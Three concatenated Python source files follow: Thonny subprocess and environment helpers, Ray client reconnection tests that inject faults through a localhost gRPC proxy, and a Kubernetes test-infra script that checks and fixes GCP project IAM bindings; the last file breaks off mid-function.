    cmd = [python_exe] + args

    if running_on_windows():
        # Separate process group (presumably so the child can be signalled
        # independently of Thonny — TODO confirm); hide the console window.
        creationflags = subprocess.CREATE_NEW_PROCESS_GROUP
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
    else:
        startupinfo = None
        creationflags = 0

    proc = subprocess.Popen(
        cmd,
        stdin=stdin,
        stdout=stdout,
        stderr=stderr,
        shell=shell,
        env=env,
        universal_newlines=universal_newlines,
        startupinfo=startupinfo,
        creationflags=creationflags,
    )

    # remember the command line for later error reporting
    proc.cmd = cmd
    return proc
class BackendTerminatedError(Exception):
    """Raised when the backend process has died; carries its exit code."""

    def __init__(self, returncode):
        super().__init__()
        # exit code of the terminated backend process
        self.returncode = returncode
def get_frontend_python():
    """Return the frontend's python(.exe), mapping GUI launchers to CLI exes."""
    exe = sys.executable
    for gui_name in ("thonny.exe", "pythonw.exe"):
        exe = exe.replace(gui_name, "python.exe")
    return exe
def is_venv_interpreter_of_current_interpreter(executable):
    """Check whether *executable* belongs to a venv created from the
    currently running interpreter.

    A venv is recognized by a pyvenv.cfg whose "home" entry points at the
    same directory as the current sys.prefix.
    """
    # Look for pyvenv.cfg next to the executable and one level up
    # (POSIX venvs keep the exe in bin/, Windows venvs in Scripts/).
    # BUG FIX: the candidate paths were previously resolved relative to the
    # current working directory instead of the executable's own location.
    exe_dir = os.path.dirname(executable)
    for location in [".", ".."]:
        cfg_path = os.path.join(exe_dir, location, "pyvenv.cfg")
        if os.path.isfile(cfg_path):
            with open(cfg_path) as fp:
                content = fp.read()

            for line in content.splitlines():
                if line.replace(" ", "").startswith("home="):
                    _, home = line.split("=", maxsplit=1)
                    home = home.strip()
                    if os.path.isdir(home) and os.path.samefile(home, sys.prefix):
                        return True
    return False
def get_environment_for_python_subprocess(target_executable):
    """Return a full environment dict suitable for running *target_executable*."""
    overrides = get_environment_overrides_for_python_subprocess(target_executable)
    return get_environment_with_overrides(overrides)
def get_environment_with_overrides(overrides):
    """Return a copy of os.environ with *overrides* applied.

    A value of None removes the variable; a key of "PATH" (any case) is
    merged via update_system_path instead of being replaced outright.
    """
    env = os.environ.copy()
    for key, value in overrides.items():
        if value is None:
            # BUG FIX: a None override for a variable that is not currently
            # set used to fall through to the isinstance assert and crash;
            # removal of an absent variable is now a no-op.
            env.pop(key, None)
        else:
            assert isinstance(value, str)
            if key.upper() == "PATH":
                update_system_path(env, value)
            else:
                env[key] = value
    return env
def get_environment_overrides_for_python_subprocess(target_executable):
    """Take care of not not confusing different interpreter
    with variables meant for bundled interpreter.

    Returns a dict of variable -> value overrides; a value of None means
    "remove this variable from the child's environment".
    """
    # At the moment I'm tweaking the environment only if current
    # exe is bundled for Thonny.
    # In remaining cases it is user's responsibility to avoid
    # calling Thonny with environment which may be confusing for
    # different Pythons called in a subprocess.

    this_executable = sys.executable.replace("pythonw.exe", "python.exe")
    target_executable = target_executable.replace("pythonw.exe", "python.exe")
    interpreter_specific_keys = [
        "TCL_LIBRARY",
        "TK_LIBRARY",
        "LD_LIBRARY_PATH",
        "DYLD_LIBRARY_PATH",
        "SSL_CERT_DIR",
        "SSL_CERT_FILE",
        "PYTHONHOME",
        "PYTHONPATH",
        "PYTHONNOUSERSITE",
        "PYTHONUSERBASE",
    ]

    result = {}

    # NOTE(review): os.path.samefile raises if either path does not exist —
    # presumably both executables always exist here; confirm against callers.
    if os.path.samefile(
        target_executable, this_executable
    ) or is_venv_interpreter_of_current_interpreter(target_executable):
        # bring out some important variables so that they can
        # be explicitly set in macOS Terminal
        # (If they are set then it's most likely because current exe is in Thonny bundle)
        for key in interpreter_specific_keys:
            if key in os.environ:
                result[key] = os.environ[key]

        # never pass some variables to different interpreter
        # (even if it's venv or symlink to current one)
        if not is_same_path(target_executable, this_executable):
            for key in [
                "PYTHONPATH",
                "PYTHONHOME",
                "PYTHONNOUSERSITE",
                "PYTHONUSERBASE",
            ]:
                if key in os.environ:
                    result[key] = None
    else:
        # interpreters are not related
        # interpreter specific keys most likely would confuse other interpreter
        for key in interpreter_specific_keys:
            if key in os.environ:
                result[key] = None

    # some keys should be never passed
    for key in [
        "PYTHONSTARTUP",
        "PYTHONBREAKPOINT",
        "PYTHONDEBUG",
        "PYTHONNOUSERSITE",
        "PYTHONASYNCIODEBUG",
    ]:
        if key in os.environ:
            result[key] = None

    # venv may not find (correct) Tk without assistance (eg. in Ubuntu)
    if is_venv_interpreter_of_current_interpreter(target_executable):
        try:
            if "TCL_LIBRARY" not in os.environ or "TK_LIBRARY" not in os.environ:
                result["TCL_LIBRARY"] = get_workbench().tk.exprstring("$tcl_library")
                result["TK_LIBRARY"] = get_workbench().tk.exprstring("$tk_library")
        except Exception:
            logging.exception("Can't compute Tcl/Tk library location")

    return result
|
test_client_reconnect.py
|
from concurrent import futures
import asyncio
import contextlib
import os
import threading
import sys
import grpc
import numpy as np
import time
import random
import pytest
from typing import Any, Callable, Optional
from unittest.mock import patch
import ray
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS
import ray.util.client.server.server as ray_client_server
from ray._private.client_mode_hook import disable_client_hook
# At a high level, these tests rely on an extra RPC server sitting
# between the client and the real Ray server to inject errors, drop responses
# and drop requests, i.e. at a high level:
#
#   Ray Client <-> Middleman Server <-> Proxy Server

# Type for middleman hooks used to inject errors: each hook receives the
# in-flight request/response message and may raise to simulate a failure.
Hook = Callable[[Any], None]
class MiddlemanDataServicer(ray_client_pb2_grpc.RayletDataStreamerServicer):
    """
    Forwards all requests to the real data servicer. Useful for injecting
    errors between a client and server pair.
    """

    def __init__(
        self, on_response: Optional[Hook] = None, on_request: Optional[Hook] = None
    ):
        """
        Args:
            on_response: Optional hook to inject errors before sending back a
                response
            on_request: Optional hook to inject errors before forwarding a
                request
        """
        self.stub = None
        self.on_response = on_response
        self.on_request = on_request

    def set_channel(self, channel: grpc.Channel) -> None:
        # (Re)bind the stub to a fresh channel to the real server
        self.stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)

    def _requests(self, request_iterator):
        # Pass each client request through the on_request hook before
        # forwarding it to the real server.
        for req in request_iterator:
            if self.on_request:
                self.on_request(req)
            yield req

    def Datapath(self, request_iterator, context):
        """Proxy the bidirectional data stream, applying both hooks."""
        try:
            for response in self.stub.Datapath(
                self._requests(request_iterator), metadata=context.invocation_metadata()
            ):
                if self.on_response:
                    self.on_response(response)
                yield response
        except grpc.RpcError as e:
            # Mirror the upstream error onto our own context
            context.set_code(e.code())
            context.set_details(e.details())
class MiddlemanLogServicer(ray_client_pb2_grpc.RayletLogStreamerServicer):
    """
    Forwards all requests to the real log servicer. Useful for injecting
    errors between a client and server pair.
    """

    def __init__(self, on_response: Optional[Hook] = None):
        """
        Args:
            on_response: Optional hook to inject errors before sending back a
                response
        """
        self.stub = None
        self.on_response = on_response

    def set_channel(self, channel: grpc.Channel) -> None:
        # (Re)bind the stub to a fresh channel to the real server
        self.stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)

    def Logstream(self, request_iterator, context):
        """Proxy the log stream, applying the response hook."""
        try:
            for response in self.stub.Logstream(
                request_iterator, metadata=context.invocation_metadata()
            ):
                if self.on_response:
                    self.on_response(response)
                yield response
        except grpc.RpcError as e:
            # Mirror the upstream error onto our own context
            context.set_code(e.code())
            context.set_details(e.details())
class MiddlemanRayletServicer(ray_client_pb2_grpc.RayletDriverServicer):
    """
    Forwards all requests to the raylet driver servicer. Useful for injecting
    errors between a client and server pair.
    """

    def __init__(
        self, on_request: Optional[Hook] = None, on_response: Optional[Hook] = None
    ):
        """
        Args:
            on_request: Optional hook to inject errors before forwarding a
                request
            on_response: Optional hook to inject errors before sending back a
                response
        """
        self.stub = None
        self.on_request = on_request
        self.on_response = on_response

    def set_channel(self, channel: grpc.Channel) -> None:
        # (Re)bind the stub to a fresh channel to the real server
        self.stub = ray_client_pb2_grpc.RayletDriverStub(channel)

    def _call_inner_function(
        self, request: Any, context, method: str
    ) -> Any:  # annotation fixed: returns the proxied response, not a stub
        """Forward *request* to stub.<method>, applying both hooks."""
        if self.on_request:
            self.on_request(request)

        try:
            response = getattr(self.stub, method)(
                request, metadata=context.invocation_metadata()
            )
        except grpc.RpcError as e:
            # Mirror the upstream error onto our own context, then re-raise
            context.set_code(e.code())
            context.set_details(e.details())
            raise

        if self.on_response and method != "GetObject":
            # GetObject streams response, handle on_response separately
            self.on_response(response)
        return response

    def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
        return self._call_inner_function(request, context, "Init")

    def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
        return self._call_inner_function(request, context, "KVPut")

    def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
        return self._call_inner_function(request, context, "KVGet")

    def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
        return self._call_inner_function(request, context, "KVDel")

    def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
        return self._call_inner_function(request, context, "KVList")

    def KVExists(self, request, context=None) -> ray_client_pb2.KVExistsResponse:
        return self._call_inner_function(request, context, "KVExists")

    def ListNamedActors(
        self, request, context=None
    ) -> ray_client_pb2.ClientListNamedActorsResponse:
        return self._call_inner_function(request, context, "ListNamedActors")

    def ClusterInfo(self, request, context=None) -> ray_client_pb2.ClusterInfoResponse:
        return self._call_inner_function(request, context, "ClusterInfo")

    def Terminate(self, req, context=None):
        return self._call_inner_function(req, context, "Terminate")

    def GetObject(self, request, context=None):
        # Streaming RPC: apply on_response per chunk rather than once
        for response in self._call_inner_function(request, context, "GetObject"):
            if self.on_response:
                self.on_response(response)
            yield response

    def PutObject(
        self, request: ray_client_pb2.PutRequest, context=None
    ) -> ray_client_pb2.PutResponse:
        return self._call_inner_function(request, context, "PutObject")

    def WaitObject(
        self, request: ray_client_pb2.WaitRequest, context=None
    ) -> ray_client_pb2.WaitResponse:
        return self._call_inner_function(request, context, "WaitObject")

    def Schedule(
        self, task: ray_client_pb2.ClientTask, context=None
    ) -> ray_client_pb2.ClientTaskTicket:
        return self._call_inner_function(task, context, "Schedule")
class MiddlemanServer:
    """
    Helper class that wraps the RPC server that middlemans the connection
    between the client and the real ray server. Useful for injecting
    errors between a client and server pair.
    """

    def __init__(
        self,
        listen_addr: str,
        real_addr,
        on_log_response: Optional[Hook] = None,
        on_data_request: Optional[Hook] = None,
        on_data_response: Optional[Hook] = None,
        on_task_request: Optional[Hook] = None,
        on_task_response: Optional[Hook] = None,
    ):
        """
        Args:
            listen_addr: The address the middleman server will listen on
            real_addr: The address of the real ray server
            on_log_response: Optional hook to inject errors before sending back
                a log response
            on_data_request: Optional hook to inject errors before forwarding
                a data request
            on_data_response: Optional hook to inject errors before sending
                back a data response
            on_task_request: Optional hook to inject errors before forwarding
                a raylet driver request
            on_task_response: Optional hook to inject errors before sending
                back a raylet driver response
        """
        self.listen_addr = listen_addr
        self.real_addr = real_addr
        self.server = grpc.server(
            futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
            options=GRPC_OPTIONS,
        )
        # One middleman servicer per RPC service exposed by the real server
        self.task_servicer = MiddlemanRayletServicer(
            on_response=on_task_response, on_request=on_task_request
        )
        self.data_servicer = MiddlemanDataServicer(
            on_response=on_data_response, on_request=on_data_request
        )
        self.logs_servicer = MiddlemanLogServicer(on_response=on_log_response)
        ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
            self.task_servicer, self.server
        )
        ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
            self.data_servicer, self.server
        )
        ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
            self.logs_servicer, self.server
        )
        self.server.add_insecure_port(self.listen_addr)
        self.channel = None
        self.reset_channel()

    def reset_channel(self) -> None:
        """
        Manually close and reopen the channel to the real ray server. This
        simulates a disconnection between the client and the server.
        """
        if self.channel:
            self.channel.close()
        self.channel = grpc.insecure_channel(self.real_addr, options=GRPC_OPTIONS)
        # NOTE(review): the readiness future is created but never waited on
        # (no .result() call) — confirm whether blocking here was intended.
        grpc.channel_ready_future(self.channel)
        # Point every servicer's stub at the new channel
        self.task_servicer.set_channel(self.channel)
        self.data_servicer.set_channel(self.channel)
        self.logs_servicer.set_channel(self.channel)

    def start(self) -> None:
        """Start serving on listen_addr."""
        self.server.start()

    def stop(self, grace: int) -> None:
        """Stop the server, waiting up to *grace* seconds."""
        self.server.stop(grace)
@contextlib.contextmanager
def start_middleman_server(
    on_log_response=None,
    on_data_request=None,
    on_data_response=None,
    on_task_request=None,
    on_task_response=None,
):
    """
    Helper context that starts a middleman server listening on port 10011,
    and a ray client server on port 50051.

    Yields (middleman, server); the hooks are forwarded to MiddlemanServer.
    """
    ray._inside_client_test = True
    server = ray_client_server.serve("localhost:50051")
    middleman = None
    try:
        middleman = MiddlemanServer(
            listen_addr="localhost:10011",
            real_addr="localhost:50051",
            on_log_response=on_log_response,
            on_data_request=on_data_request,
            on_data_response=on_data_response,
            on_task_request=on_task_request,
            on_task_response=on_task_response,
        )
        middleman.start()
        # Clients connect through the middleman, not the real server
        ray.init("ray://localhost:10011")
        yield middleman, server
    finally:
        ray._inside_client_test = False
        ray.util.disconnect()
        if middleman:
            middleman.stop(0)
        # Delete server to allow the client server to be GC'ed, which shuts
        # down Ray. Then wait for Ray to shut down in the local process.
        # Otherwise, the Ray cluster may stay alive until the next call to
        # start_middleman_server(), become the backing Ray cluster to the
        # client server, and shut down in the middle of the test case after
        # GC finally catches up, leading to test failures.
        server.stop(0)
        del server
        start = time.monotonic()
        with disable_client_hook():
            while ray.is_initialized():
                time.sleep(1)
                if time.monotonic() - start > 30:
                    raise RuntimeError("Failed to terminate Ray")
def test_disconnect_during_get():
    """
    Disconnect the proxy and the client in the middle of a long running get
    """

    @ray.remote
    def slow_result():
        time.sleep(20)
        return 12345

    def disconnect(middleman):
        # Sever the middleman's channel while the client is blocked in ray.get
        time.sleep(3)
        middleman.reset_channel()

    with start_middleman_server() as (middleman, _):
        disconnect_thread = threading.Thread(target=disconnect, args=(middleman,))
        disconnect_thread.start()
        # The get must survive the reconnect and still return the right value
        result = ray.get(slow_result.remote())
        assert result == 12345
        disconnect_thread.join()
def test_disconnects_during_large_get():
    """
    Disconnect repeatedly during a large (multi-chunk) get.
    """
    i = 0
    # "started" prevents erroring during the initial connection handshake
    started = False

    def fail_every_three(_):
        # Inject an error every third time this method is called
        nonlocal i, started
        if not started:
            return
        i += 1
        if i % 3 == 0:
            raise RuntimeError

    @ray.remote
    def large_result():
        # 1024x1024x128 float64 matrix (1024 MiB). With 64MiB chunk size,
        # it will take at least 16 chunks to transfer this object. Since
        # the failure is injected every 3 chunks, this transfer can only
        # work if the chunked get request retries at the last received chunk
        # (instead of starting from the beginning each retry)
        return np.random.random((1024, 1024, 128))

    with start_middleman_server(on_task_response=fail_every_three):
        started = True
        result = ray.get(large_result.remote())
        assert result.shape == (1024, 1024, 128)
def test_disconnects_during_large_async_get():
    """
    Disconnect repeatedly during a large (multi-chunk) async get.
    """
    i = 0
    # "started" prevents erroring during the initial connection handshake
    started = False

    def fail_every_three(_):
        # Inject an error every third time this method is called
        nonlocal i, started
        if not started:
            return
        i += 1
        if i % 3 == 0:
            raise RuntimeError

    @ray.remote
    def large_result():
        # 1024x1024x128 float64 matrix (1024 MiB). With 64MiB chunk size,
        # it will take at least 16 chunks to transfer this object. Since
        # the failure is injected every 3 chunks, this transfer can only
        # work if the chunked get request retries at the last received chunk
        # (instead of starting from the beginning each retry)
        return np.random.random((1024, 1024, 128))

    with start_middleman_server(on_data_response=fail_every_three):
        started = True

        async def get_large_result():
            return await large_result.remote()

        # asyncio.run replaces the deprecated get_event_loop() +
        # run_until_complete pattern and guarantees a fresh loop per run.
        result = asyncio.run(get_large_result())
        assert result.shape == (1024, 1024, 128)
def test_disconnect_during_large_put():
    """
    Disconnect during a large (multi-chunk) put.
    """
    i = 0
    # "started" prevents erroring during the initial connection handshake
    started = False

    def fail_halfway(_):
        # Inject an error halfway through the object transfer
        nonlocal i, started
        if not started:
            return
        i += 1
        if i == 8:
            raise RuntimeError

    with start_middleman_server(on_data_request=fail_halfway):
        started = True
        objref = ray.put(np.random.random((1024, 1024, 128)))
        assert i > 8  # Check that the failure was injected
        result = ray.get(objref)
        assert result.shape == (1024, 1024, 128)
def test_disconnect_during_large_schedule():
    """
    Disconnect during a remote call with a large (multi-chunk) argument.
    """
    i = 0
    # "started" prevents erroring during the initial connection handshake
    started = False

    def fail_halfway(_):
        # Inject an error halfway through the object transfer
        nonlocal i, started
        if not started:
            return
        i += 1
        if i == 8:
            raise RuntimeError

    @ray.remote
    def f(a):
        return a.shape

    with start_middleman_server(on_data_request=fail_halfway):
        started = True
        a = np.random.random((1024, 1024, 128))
        result = ray.get(f.remote(a))
        assert i > 8  # Check that the failure was injected
        assert result == (1024, 1024, 128)
def test_valid_actor_state():
    """
    Repeatedly inject errors in the middle of mutating actor calls. Check
    at the end that the final state of the actor is consistent with what
    we would expect had the disconnects not occurred.
    """

    @ray.remote
    class IncrActor:
        def __init__(self):
            self.val = 0

        def incr(self):
            self.val += 1
            return self.val

    i = 0
    # This is to prevent erroring in the initial connection logic.
    started = False

    def fail_every_seven(_):
        # Inject an error every seventh time this method is called
        nonlocal i, started
        i += 1
        if i % 7 == 0 and started:
            raise RuntimeError

    with start_middleman_server(
        on_data_response=fail_every_seven,
        on_task_request=fail_every_seven,
        on_task_response=fail_every_seven,
    ):
        started = True
        actor = IncrActor.remote()
        for _ in range(100):
            ref = actor.incr.remote()
        # Exactly 100 increments must have been applied despite the retries
        assert ray.get(ref) == 100
def test_valid_actor_state_2():
    """
    Do a full disconnect (cancel channel) every 11 requests. Failure
    happens:
      - before request sent: request never reaches server
      - before response received: response never reaches server
      - while get's are being processed
    """

    @ray.remote
    class IncrActor:
        def __init__(self):
            self.val = 0

        def incr(self):
            self.val += 1
            return self.val

    i = 0

    with start_middleman_server() as (middleman, _):

        def fail_every_eleven(_):
            nonlocal i
            i += 1
            if i % 11 == 0:
                # Full channel reset, not just an injected exception
                middleman.reset_channel()

        middleman.data_servicer.on_response = fail_every_eleven
        middleman.task_servicer.on_request = fail_every_eleven
        middleman.task_servicer.on_response = fail_every_eleven

        actor = IncrActor.remote()
        for _ in range(100):
            ref = actor.incr.remote()
        # Exactly 100 increments must have been applied despite the resets
        assert ray.get(ref) == 100
def test_noisy_puts():
    """
    Randomly kills the data channel with 10% chance when receiving response
    (requests made it to server, responses dropped) and checks that final
    result is still consistent
    """
    # Fixed seed keeps the failure pattern reproducible across runs
    random.seed(12345)
    with start_middleman_server() as (middleman, _):

        def fail_randomly(response: ray_client_pb2.DataResponse):
            if random.random() < 0.1:
                raise RuntimeError

        middleman.data_servicer.on_response = fail_randomly

        refs = [ray.put(i * 123) for i in range(500)]
        results = ray.get(refs)
        for i, result in enumerate(results):
            assert result == i * 123
def test_client_reconnect_grace_period():
    """
    Tests that the client gives up attempting to reconnect the channel
    after the grace period expires.
    """
    # Lower grace period to 5 seconds to save time
    with patch.dict(
        os.environ, {"RAY_CLIENT_RECONNECT_GRACE_PERIOD": "5"}
    ), start_middleman_server() as (middleman, _):
        assert ray.get(ray.put(42)) == 42
        # Close channel
        middleman.channel.close()
        start_time = time.time()
        with pytest.raises(ConnectionError):
            ray.get(ray.put(42))
        # Connection error should have been raised within a reasonable
        # amount of time. Set to significantly higher than 5 seconds
        # to account for reconnect backoff timing
        assert time.time() - start_time < 20
if __name__ == "__main__":
    # PARALLEL_CI: run tests under pytest-xdist with per-test subprocesses
    if os.environ.get("PARALLEL_CI"):
        sys.exit(pytest.main(["-n", "auto", "--boxed", "-vs", __file__]))
    else:
        sys.exit(pytest.main(["-sv", __file__]))
|
check_projects.py
|
#!/usr/bin/env python
# Copyright 2016 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Check properties of test projects, optionally fixing them.
Example config:
{
"IAM": {
"roles/editor": [
"serviceAccount:foo@bar.com",
"user:me@you.com",
"group:whatever@googlegroups.com"],
"roles/viewer": [...],
},
  "EnableVMZonalDNS": True,
}
"""
import argparse
import collections
import json
import logging
import os.path
import re
import subprocess
import sys
import threading
from argparse import RawTextHelpFormatter
# pylint: disable=invalid-name
_log = logging.getLogger('check_project')

# Settings applied when no config file is given on the command line.
DEFAULT = {
    'IAM': {
        'roles/editor': [
            'serviceAccount:kubekins@kubernetes-jenkins.iam.gserviceaccount.com',
            'serviceAccount:pr-kubekins@kubernetes-jenkins-pull.iam.gserviceaccount.com'],
    },
    'EnableVMZonalDNS': False,
}
class RateLimitedExec(object):
    """Runs subprocess commands, limiting how many execute concurrently."""

    def __init__(self):
        # At most 10 concurrent gcloud calls
        self.semaphore = threading.Semaphore(10)

    def check_output(self, *args, **kwargs):
        """subprocess.check_output, gated by the rate limit."""
        with self.semaphore:
            return subprocess.check_output(*args, **kwargs)

    def call(self, *args, **kwargs):
        """subprocess.call, gated by the rate limit."""
        with self.semaphore:
            return subprocess.call(*args, **kwargs)
class Results(object):
    """Thread-safe accumulator of per-project check outcomes."""

    class Info(object):
        """Per-project information"""

        def __init__(self):
            self.updated = False
            # errors is list of strings describing the error context
            self.errors = []
            # People with owners rights to update error projects
            self.helpers = []

    def __init__(self):
        self.lock = threading.Lock()
        self.projects = {}  # project -> Info

    @property
    def errors(self):
        """Returns set of projects that have errors."""
        return {name for name, info in self.projects.items() if info.errors}

    @property
    def counts(self):
        """Returns count of (total, updated, error'ed) projects."""
        with self.lock:
            infos = list(self.projects.values())
            total = len(infos)
            updated = sum(1 for info in infos if info.updated)
            errored = sum(1 for info in infos if info.errors)
            return (total, updated, errored)

    def report_project(self, project):
        """Register *project* so it is counted even if nothing else happens."""
        with self.lock:
            self.ensure_info(project)

    def report_error(self, project, err):
        """Record error context *err* against *project*."""
        with self.lock:
            self.ensure_info(project).errors.append(err)

    def report_updated(self, project):
        """Mark *project* as having been fixed up."""
        with self.lock:
            self.ensure_info(project).updated = True

    def add_helper(self, project, helpers):
        """Remember the owners able to fix *project*."""
        with self.lock:
            self.ensure_info(project).helpers = helpers

    def ensure_info(self, project):
        """Return the Info for *project*, creating it on first use."""
        return self.projects.setdefault(project, Results.Info())
def run_threads_to_completion(threads):
    """Start every thread in *threads*, then wait for all of them to finish."""
    for worker in threads:
        worker.start()
    for worker in threads:
        worker.join()
def parse_args():
    """Returns parsed arguments."""
    parser = argparse.ArgumentParser(
        description=__doc__, formatter_class=RawTextHelpFormatter)
    parser.add_argument(
        # NOTE(review): the filter is matched against job *file* names
        # in load_projects, not against project names
        '--filter', default=r'^.+\.(env|sh)$',
        help='Only look for projects with the specified names')
    parser.add_argument(
        '--fix', action='store_true', help='Add missing memberships')
    parser.add_argument(
        '--verbose', action='store_true',
        help='Enable verbose output')
    parser.add_argument(
        # get_config both validates the path and loads the JSON
        'config', type=get_config, default='', nargs='?',
        help='Path to json configuration')
    return parser.parse_args()
def get_config(string):
    """Returns configuration for project settings.

    An empty string selects the built-in DEFAULT config; otherwise the
    argument must be the path of a JSON file.
    """
    if not string:
        return DEFAULT
    if not os.path.isfile(string):
        raise argparse.ArgumentTypeError('not a file: %s' % string)
    with open(string) as fp:
        return json.load(fp)
class Checker(object):
    """Runs the checks against all projects."""

    def __init__(self, config):
        self.config = config
        self.rl_exec = RateLimitedExec()
        self.results = Results()

    def run(self, filt, fix=False):
        """Checks projects for correct settings.

        Args:
            filt: regex string used to select job files to scan
            fix: if True, properties attempt to repair what they find wrong
        """

        def check(project, fix):
            # Runs in its own thread; Results does the locking.
            self.results.report_project(project)
            # Every ProjectProperty subclass defined in this module is checked
            # pylint: disable=no-member
            for prop_class in ProjectProperty.__subclasses__():
                prop = prop_class(self.rl_exec, self.results)
                _log.info('Checking project %s for %s', project, prop.name())
                prop.check_and_maybe_update(self.config, project, fix)

        projects = self.load_projects(
            '%s/../jobs' % os.path.dirname(__file__),
            '%s/../boskos/resources.json' % os.path.dirname(__file__),
            filt)
        _log.info('Checking %d projects', len(projects))
        run_threads_to_completion(
            [threading.Thread(target=check, args=(project, fix))
             for project in sorted(projects)])
        self.log_summary()

    def log_summary(self):
        """Log totals, per-project errors and helper owners; exit 1 on errors."""
        _log.info('====')
        _log.info(
            'Summary: %d projects, %d have been updated, %d have problems',
            *self.results.counts)
        _log.info('====')
        for key in self.results.errors:
            project = self.results.projects[key]
            _log.info(
                'Project %s needs to fix: %s', key, ','.join(project.errors))
        _log.info('Helpers:')
        fixers = collections.defaultdict(int)
        unk = ['user:unknown']
        for project in self.results.errors:
            helpers = self.results.projects[project].helpers
            if not helpers:
                helpers = unk
            for name in helpers:
                fixers[name] += 1
            _log.info(' %s: %s', project, ','.join(
                self.sane(s) for s in sorted(helpers)))
        # Owners sorted by how many broken projects they can help with
        for name, count in sorted(fixers.items(), key=lambda i: i[1]):
            _log.info(' %s: %s', count, self.sane(name))
        if self.results.counts[2] != 0:
            sys.exit(1)

    @staticmethod
    def sane(member):
        """Shorten an IAM member like "user:foo@bar.com" to "foo"."""
        if ':' not in member:
            raise ValueError(member)
        email = member.split(':')[1]
        return email.split('@')[0]

    @staticmethod
    def load_projects(configs, boskos, filt):
        """Scans the project directories for GCP projects to check."""
        filter_re = re.compile(filt)
        project_re = re.compile('^PROJECT="?([^"\r\n]+)"?$', re.MULTILINE)
        projects = set()
        for dirname, _, files in os.walk(configs):
            for path in files:
                full_path = os.path.join(dirname, path)
                _log.debug('Path = %s', path)
                if not filter_re.match(path):
                    continue
                with open(full_path) as fp:
                    for project in project_re.findall(fp.read()):
                        if '{' not in project:
                            projects.add(project)
                            continue
                        else:
                            # templated project names can't be checked
                            raise ValueError(project)
        # boskos pool projects are checked as well
        with open(boskos) as fp:
            for rtype in json.loads(fp.read()):
                if rtype['type'] == 'project':
                    for name in rtype['names']:
                        projects.add(name)
        return projects
class ProjectProperty(object):
    """Base class for properties that are checked for each project.

    Every subclass is auto-discovered (via __subclasses__) and run
    against every project; subclasses must implement both methods.
    """

    def name(self):
        """Return the human readable name of the property."""
        raise NotImplementedError()

    def check_and_maybe_update(self, config, project, fix):
        """Check and maybe update the project for the required property.

        Args:
            config: project configuration.
            project: project to check.
            fix: if True, update the project property.
        """
        raise NotImplementedError()
class IAMProperty(ProjectProperty):
    """Project has the correct IAM properties."""
    def __init__(self, rl_exec, results):
        # rl_exec: shared rate-limited command executor.
        # results: shared result accumulator.
        self.rl_exec = rl_exec
        self.results = results
    def name(self):
        """Human-readable property name used in logs and error reports."""
        return 'IAM'
    def check_and_maybe_update(self, config, project, fix):
        """Diff the project's IAM bindings against config['IAM'] and
        optionally add any missing role/member bindings.

        Args:
            config: settings dict; expects 'IAM' mapping role -> members.
            project: GCP project id.
            fix: if True, add missing bindings via gcloud.
        """
        if 'IAM' not in config:
            return
        try:
            out = self.rl_exec.check_output([
                'gcloud',
                'projects',
                'get-iam-policy',
                project,
                '--format=json(bindings)'])
        except subprocess.CalledProcessError:
            _log.info('Cannot access %s', project)
            self.results.report_error(project, 'access')
            return
        needed = config['IAM']
        bindings = json.loads(out)
        # fixes: role -> set/list of members that must be added.
        fixes = {}
        roles = set()
        for binding in bindings['bindings']:
            role = binding['role']
            roles.add(role)
            members = binding['members']
            if role in needed:
                missing = set(needed[role]) - set(members)
                if missing:
                    fixes[role] = missing
            # Owners are recorded as "helpers" who could fix this project.
            if role == 'roles/owner':
                self.results.add_helper(project, members)
        # Roles required by config but entirely absent from the policy.
        missing_roles = set(needed) - roles
        for role in missing_roles:
            fixes[role] = needed[role]
        if not fixes:
            _log.info('Project %s IAM is already configured', project)
            return
        if not fix:
            _log.info('Will not --fix %s, wanted fixed %s', project, fixes)
            self.results.report_error(project, self.name())
            return
        # One thread per (role, member) binding addition.
        updates = []
        for role, members in sorted(fixes.items()):
            updates.extend(
                threading.Thread(target=self.update, args=(project, role, m))
                for m in members)
        run_threads_to_completion(updates)
    def update(self, project, role, member):
        """Add a single role/member IAM binding and record the outcome."""
        cmdline = [
            'gcloud', '-q', 'projects', 'add-iam-policy-binding',
            '--role=%s' % role,
            '--member=%s' % member,
            project
        ]
        # Discard gcloud's stdout; only the exit status matters here.
        err = self.rl_exec.call(cmdline, stdout=open('/dev/null', 'w'))
        if not err:
            _log.info('Added %s as %s to %s', member, role, project)
            self.results.report_updated(project)
        else:
            _log.info('Could not update IAM for %s', project)
            self.results.report_error(
                project, 'update %s (role=%s, member=%s)' %
                (self.name(), role, member))
class EnableVmZonalDNS(ProjectProperty):
    """Project has Zonal DNS enabled."""
    def __init__(self, rl_exec, results):
        # rl_exec: shared rate-limited command executor.
        # results: shared result accumulator.
        self.rl_exec = rl_exec
        self.results = results
    def name(self):
        """Human-readable property name used in logs and error reports."""
        return 'EnableVMZonalDNS'
    def check_and_maybe_update(self, config, project, fix):
        """Compare the project's EnableVmZonalDNS metadata with the config.

        Args:
            config: settings dict; key 'EnableVMZonalDNS' (bool, default False).
            project: GCP project id.
            fix: if True, apply the metadata change when out of sync.
        """
        try:
            out = self.rl_exec.check_output([
                'gcloud', 'compute', 'project-info', 'describe',
                '--project=' + project,
                '--format=json(commonInstanceMetadata.items)'])
        except subprocess.CalledProcessError:
            # Unlike IAMProperty, inaccessible projects are not reported
